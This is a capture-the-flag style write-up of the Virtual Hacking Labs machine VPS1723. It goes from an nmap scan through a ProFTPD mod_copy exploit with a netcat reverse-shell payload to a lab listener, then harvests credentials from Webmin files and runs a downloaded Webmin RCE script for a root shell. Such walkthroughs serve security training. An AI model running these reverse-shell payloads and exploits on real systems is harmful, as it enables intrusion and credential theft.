xsspresso
xsspresso
WriteupsVHL — VPS1723
WebEasyLinux

VHL — VPS1723

Webmin 1.991 on Ubuntu. CVE-2019-15107 arbitrary command execution via the password reset endpoint for instant root access.

February 10, 2025Virtual Hacking Labs
#Webmin#CVE-2019-15107#RCE#ProFTPD

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 21:40 EST
Nmap scan report for 10.11.1.53
Host is up (0.021s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
21/tcp    open  ftp        ProFTPD 1.3.5
22/tcp    open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ec:4e:15:c3:91:e6:76:0d:b0:79:d7:e0:c7:8c:a6:d0 (RSA)
|   256 3a:27:36:f6:da:22:eb:bf:ce:e3:97:4c:9c:01:d9:eb (ECDSA)
|_  256 c4:97:f5:f2:cf:99:d0:6a:9d:9f:2c:dc:c3:dc:1c:f8 (ED25519)
80/tcp    open  http       Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
81/tcp    open  tcpwrapped
10000/tcp open  http       MiniServ 1.991 (Webmin httpd)
|_http-title: Login to Webmin
|_http-server-header: MiniServ/1.991
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 1 disallowed entry 
|_/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/10%OT=21%CT=1%CU=39143%PV=Y%DS=2%DC=I%G=Y%TM=67AA
OS:B8EF%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10E%TI=Z%II=I%TS=A)SEQ(S
OS:P=FF%GCD=1%ISR=10E%TI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M
OS:5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE8
OS:8%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%
OS:CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40
OS:%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
 
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE
HOP RTT      ADDRESS
1   20.60 ms 10.11.1.53
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.55 seconds

21

sh
21/tcp    open  ftp        ProFTPD 1.3.5
sh
ftp anonymou@10.11.1.53 
Connected to 10.11.1.53.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.11.1.53]
331 Password required for anonymou
Password: 
530 Login incorrect.
ftp: Login failed
ftp> ext
?Invalid command.
sh
python3 49908.py 10.11.1.53
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.11.1.53]
 
350 File or directory exists, ready for destination name
 
550 cpto: Permission denied
 
350 File or directory exists, ready for destination name
 
250 Copy successful
 
Exploit Completed
[+] File Written Successfully
[+] Go to : http://10.11.1.53/test.php

shell as www-data

sh
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set CMD 'busybox nc 172.16.1.1 1234 -e bash'
CMD => busybox nc 172.16.1.1 1234 -e bash
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run
sh
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options
 
Module options (exploit/unix/ftp/proftpd_modcopy_exec):
 
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CHOST                       no        The local client address
   CPORT                       no        The local client port
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.11.1.53       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.ht
                                         ml
   RPORT      80               yes       HTTP port (TCP)
   RPORT_FTP  21               yes       FTP port
   SITEPATH   /var/www/html    yes       Absolute writable website path
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to the website
   TMPPATH    /tmp             yes       Absolute writable path
   VHOST                       no        HTTP server virtual host
 
 
Payload options (cmd/unix/generic):
 
   Name  Current Setting                     Required  Description
   ----  ---------------                     --------  -----------
   CMD   busybox nc 172.16.1.1 1234 -e bash  yes       The command string to execute
sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.53] 37064
whoami
www-data
sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
sh
www-data@vps1723:/opt/webmin/mysql$ cat config
cat config
start_cmd=cd /usr/local/mysql ; (./bin/safe_mysqld || ./bin/mysqld_safe) &
perpage=25
mysql=/usr/local/mysql/bin/mysql
mysqldump=/usr/local/mysql/bin/mysqldump
mysqlimport=/usr/local/mysql/bin/mysqlimport
pass=foo
mysqlshow=/usr/local/mysql/bin/mysqlshow
login=root
mysql_libs=/usr/local/mysql/lib
mysqladmin=/usr/local/mysql/bin/mysqladmin
style=1
add_mode=1
nodbi=0
access=*: *
blob_mode=0
date_subs=0
passwd_mode=0
mysql_data=/usr/local/mysql/var
max_dbs=50
my_cnf=/etc/my.cnf
max_text=1000
nopwd=0
webmin_subs=0
sh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
 
╔══════════╣ Installed Compilers
ii  gcc                                   4:9.3.0-1ubuntu2                      amd64        GNU C compiler
ii  gcc-9                                 9.4.0-1ubuntu1~20.04.1                amd64        GNU C compiler
/usr/bin/gcc
 
╔══════════╣ MySQL version
mysql  Ver 8.0.29-0ubuntu0.20.04.3 for Linux on x86_64 ((Ubuntu))
sh
./bin/passwd:211: - passwd root
./bin/passwd:213: - passwd --user root
./bin/passwd:215: - passwd --user root --password ycwyMQRVAZY
./bin/passwd:217: - passwd --config /usr/local/etc/webmin --user root --password ycwyMQRVAZY
sh
www-data@vps1723:/opt/webmin$ grep -rn ./ -ie "password" 
 
./mailboxes/boxes-lib.pl:948:	# Get username and password from parameters, or from module config
./setup.bat:27:SET password=admin
./demo.txt:2:password: x8rqsPHQ6X98A
sh
www-data@vps1723:/opt/webmin$ cat demo.txt
cat demo.txt
username: demouser
password: x8rqsPHQ6X98A

creds

demouser:x8rqsPHQ6X98A

80

sh
80/tcp    open  http       Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)

10000

sh
10000/tcp open  http       MiniServ 1.991 (Webmin httpd)
|_http-title: Login to Webmin
|_http-server-header: MiniServ/1.991
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 1 disallowed entry 
|_/

webmin

login with credentials found demouser:x8rqsPHQ6X98A

Webmin version 1.991 RCE

  • https://github.com/esp0xdeadbeef/rce_webmin
sh
wget https://raw.githubusercontent.com/esp0xdeadbeef/rce_webmin/refs/heads/main/exploit.py
sh
python3 webmin_rce.py -u http://10.11.1.53:10000 -pw x8rqsPHQ6X98A -un demouser -rh 172.16.1.1 -rp 1235
sh
nc -lnvp 1235
listening on [any] 1235 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.53] 58208
sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/key.txt
djk43nls93mwz17dfvba
# date
Tue Feb 11 03:57:15 UTC 202

Up next

EasyFeb 2025

VHL — Helpdesk

FTP with anonymous access reveals helpdesk application credentials. SQL injection and file upload lead to remote code execution.

Read writeup
EasyFeb 2025

VHL — Steven

Wing FTP Server on Windows. Default admin credentials allow access to the web admin panel, leading to command execution via scheduled tasks.

Read writeup
MediumFeb 2025

VHL — Records

OpenEMR medical records application. Exploited a pre-auth SQL injection CVE and file upload for shell access.

Read writeup